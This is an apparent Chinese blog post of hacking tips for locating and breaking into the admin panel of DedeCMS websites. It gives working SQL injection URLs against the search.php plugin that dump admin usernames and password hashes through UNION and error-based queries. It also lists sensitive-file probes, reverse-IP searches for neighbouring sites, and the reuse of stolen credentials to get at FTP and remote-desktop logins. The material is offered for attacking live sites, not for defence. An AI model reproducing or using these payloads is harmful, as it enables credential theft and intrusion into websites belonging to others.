dedecms站找后台的一些经验

首先:

注入exp

有时候 有些 /plus/目录换成了 /plugins目录

/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[ uNion ]=a

/robots.txt

/data/admin/ver.txt

/data/mysql_error_trace.inc

第一 个看这里 /data/mysql_error_trace.inc 爆出来补 

第二 个  域名作为后台 或者域名变形一下

第三 个 先ping域名 获得ip地址 之后 

http://www.bing.com/

搜索 ip:127.0.0.1  php 有可能获得后台 也可以获得其他旁注站 一般dedecms的旁站很多也是dedecms 的  

第四 个  查看 robots.txt

http://www.dedecms.com/robots.txt  查看旁注站dedecms的站  再去社工目标站的后台地址也可以

第五 个  注入exp得到账号 去社工 ftp 和 3389密码 

更多相关文章
  •  貌似很纠结,今天去暗组转了一圈,看到某牛发的一个帖子,是一找后台的大黑阔去非你莫属找工作的视频,看完以后我凌乱了,艹,这个黑阔真心S+B,你们看视频吧,http://static.video.qq.com/TPout.swf?vid=h001295l7ee&auto=1第一,我觉的他的记忆 ...
  •      国庆放假后我和我们班的几个同学就来到长沙.开始了我们找工作的历程,因为我们全都是从学校刚出来,社会阅历不足,到了这个让我们几个觉得陌生的城市,人生地不熟真的是不知该从何从着手,我们都只知道唯一的途径那就是人才招聘会,     我现在来长沙十多天了,找了几天的工作,体会到了现在社会上的竞争是 ...
  • 当老板问你是否要休息时,多半他是不希望你休息的. 你的第一份工作非常重要,不要轻易跳草,等你做满一年以上时,你会清楚你是否真的需要跳跳. 工作2-3年后,一定要弄清自己的职业方向在哪里.不然你会越走越迷惘. 定了职业方向你一定要坚持走下去,不要轻言放弃.要知道,无论哪个行业,只要你选对了方向,只要你 ...
  • 求百科 apache+php+mysql 在cenos32位安装完后搭建dedeCMS网站后台验证码不显示环境:apache2.2.22 php 5.2.17 mysql 5.1.37 编译安装完后所apache的安装:#./configure --prefix=/usr/local/apache ...
  • 一.网站策划书:为什么要制作网站?网站提供什么内容?设计什么样的风格适合网站?站点制作步骤布局及模块分析技术支持及培训安排推广方案二.网站策划都做什么?1.进行市场调查(根据网站定位进行的市场调查,方式:网络.现实填表.)2.确定网站规模(大型站点.小型站点还是中型站点)3.确定网站的类别及设计特色 ...
  • 上周有幸通过了某知名IT公司的笔试,获得了一次难得的面试经历,说句实在话,可能我参加的面试还不如很多学弟学妹参加的多,一方面是因为学校这边的要求比较严,很难获得实习的机会,另一方面也是我自己的问题,在这方面不算主动,导致到现在还没有真正的实习过一次,想想就觉得是人生一大遗憾啊(此处略去360个字), ...
  • 19种 网站入侵方法1.经典注入通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断,如果and 1=1正常返回页面,1=2错误,或者找不到,那么就存在注入点2.万能密码OR漏洞万 ...
  • 首先把,主站入手注册一个账号,看下上传点,等等之类的.用google找***入点,格式是Site:XXX.com inurl:asp|php|aspx|jsp最好不要带 www,因为不带的话可以检测二级域名.扫目录,看编辑器和Fckeditor,看下敏感目录,有没有目录遍及,查下是iis6,iis5 ...
一周排行
  • 导读:昨天凌晨将公司旗下的另外一个域名也升级成通过ssl证书登录的形式,那里料到过程竟然非常曲折,原因是nginx如果编译的时候使用openssl如果没有添加enable-tl***t参数的话,就只支持一个ssl证书 ...
  • 常用命令rails new new_app cd new_app rake db:create rails server rails generate controller Blog action1 action2  ...
  •             在 Windows 7 RC 中提供了一个新的功能特性,即 Windows Virtual PC,该功能提供了一个在 Windows 7 RC 下运行的 Windows XP Mode,允许用 ...
  • 博客话题那些年,我所做的运维黑线,凌乱,诡异
    最近,网上比较火的"那些年,xxxxx"体,也说说我这些年做的运维,当 ...
  • 防火墙和路由器在IPsecvpn上的区别:防火墙不支持show crypto isakmp policy命令,首先要启用ISAKMP策略然后show run crypto.查看管理链接策略配置show run防火墙默 ...
  • 10月30日,为了协助全球培训更多网络专才, Cisco宣布推出本地化的CCNA及CCENT的证书课程及考试,两个课程均大受用家欢迎.CCENT的入门证书及CCNA的副证书都专注培训学员安装.运作及支持现代会合性网络 ...
  •     企业.公司规模无论大小,都会涉及到“流程”二字,办什么事都要走流程.有了流程,感觉什么事都有章可循.有据可依了,但是流程在很多时候会让你感到无奈又可气可恨.流程管理复杂了,人不仅容易疲惫,办事效率更是容易大打 ...
  • LiferayTheme的使用范例
     我们可以开发Theme来让系统不使用默认的风格.当我们用向导创建一个Theme项目并且编 ...
  • http {   upstream  myserver {                 server  192.168.233.0;        #本机ip地址         }server {   ...
  • shodan使用笔记
    本文仅记录shodan的一些好的用法,内容多来自于互联网.1.net例子:net:183. ...